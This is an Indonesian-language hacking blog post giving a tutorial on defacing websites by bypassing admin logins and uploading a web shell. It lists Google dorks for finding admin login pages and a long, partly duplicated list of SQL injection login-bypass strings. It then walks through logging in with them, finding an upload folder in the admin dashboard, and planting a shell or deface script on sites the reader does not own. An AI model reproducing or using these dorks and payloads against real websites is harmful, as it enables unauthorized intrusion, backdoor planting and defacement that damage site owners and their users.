Tutorial Deface Bypas Admin+Upload Shell.
.jpeg)
Nekell404 - Hai Sobat Di Kesempatan Kali Ini Saya Ingin Memberikan Tutorial Deface POC Bypas Admin + Upload Shell.
Cara deface bypas admin sama dengan artikel ini menggunakan default u/p yang sudah di rancang khusus oleh para sesepuh hacker untuk di gunakan pada loginan website target sobat yang sudah di dapatkan.
Sudah banyak sesepuh hacker yang tau tentang cara ini, tapi apa salahnya saya membagikan kepada sobat semua yang belum mengetahui nya.
Oke tanpa banyak basa-basi langsung saja ke Tutorial nya.
Bahan-bahannya!
1. Dork
2. Shell Backdoor
3. SC Deface
4. WiFi Atau Paket Data
5. Kopi + Udud + Pisang Goreng
Dork Bypas Admin!
- inurl:/admin/login.php site:.com
- inurl:/adminlogin.php site:.com
- inurl: admincms site: in
- inurl: login.php site: id
*Note: Kembangkan Lagi Agar Bisa Mendapatkan Website Vuln.
Default Username/Password!
' or 1=1 limit 1 -- -+
'=''OR'
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Semua Bahan Sudah Di Siapkan Langsung Aja Ke Tutorialnya. Simak Baik-baik Ya Sobat Jangan Sampai Ngelamun J*rok:v
Langkah-langkah!
Pertama Sobat Dork Terlebih Dahulu Pake Dork Yang Sudah Saya Sediakan Diatas. Usahakanlah Untuk Meracik Dork Sesuai Dengan Keinginan Sobat.
Nah Jika Sobat Sudah Menemukan Web Yang Vuln Bypas Admin. Selanjutnya Sobat Kita Lanjut Untuk Login Menggunakan Default U/p Yang Sudah Saya Sediakan Diatas.
Disini Saya Sudah Mendapatkan Website Vuln Bypas Admin.
Selanjutnya Sobat Isi Username/Password Sesuai Dengan Arahan Saya Di Atas Atau Jika Sobat Mempunyai U/p Racikan Sendiri Juga Itu Lebih Bagus.
Username : ' or 1=1 limit 1 -- -+
Password : ' or 1=1 limit 1 -- -+
Jika Memang Website Vuln Sobat Itu Vuln Otomatis Akan Masuk Ke Dalam Dashboard Admin. Jika Tidak Masuk Ke Dashboard Admin Berarti Itu Ga Vuln Ya Sobat.
Nah Jika Sudah Login Sobat Cari Folder Di Dalam Dashboard Admin Yang Bisa Upload Shell/Script Deface Sobat.
Biasanya Tempat Upload Shell/Script Deface Itu Adanya Di Folder Image/Dokumen.
Nah Jika Sudah Menemukan Folder Yang Bisa Upload Silahkan Sobat Upload Shell/Script Deface Sobat Sesuai Keingin Sobat Saja Ya.
Nah Jika Sudah Memanggil File Yang Sobat Upload Itu Adalah Shell Maka Sobat Harus Upload SC Deface Dahulu. Dan Jika Sobat Upload Nya Script Deface Otomatis Bakal Keliatan Script Deface Sobat.
Dan Boom Sobat Sudah Bisa Deface Dengan Menggunakan Metode Bypas Admin....
Sekian Dulu Artikel Dari Saya Jangan Lupa Selalu Pantengin Blogger Ini Ya Sobat.
Maaf Bila Ada Kesalahan Atau Tidak Jelas Pada Artikel Yang Saya Buat, Karna Saya Pun Masih Banyak Belajar.
#Happyhacking
Support By : Indonesian Hacker Rulez - Cirebon Xploit
Posting Komentar untuk "Tutorial Deface Bypas Admin+Upload Shell."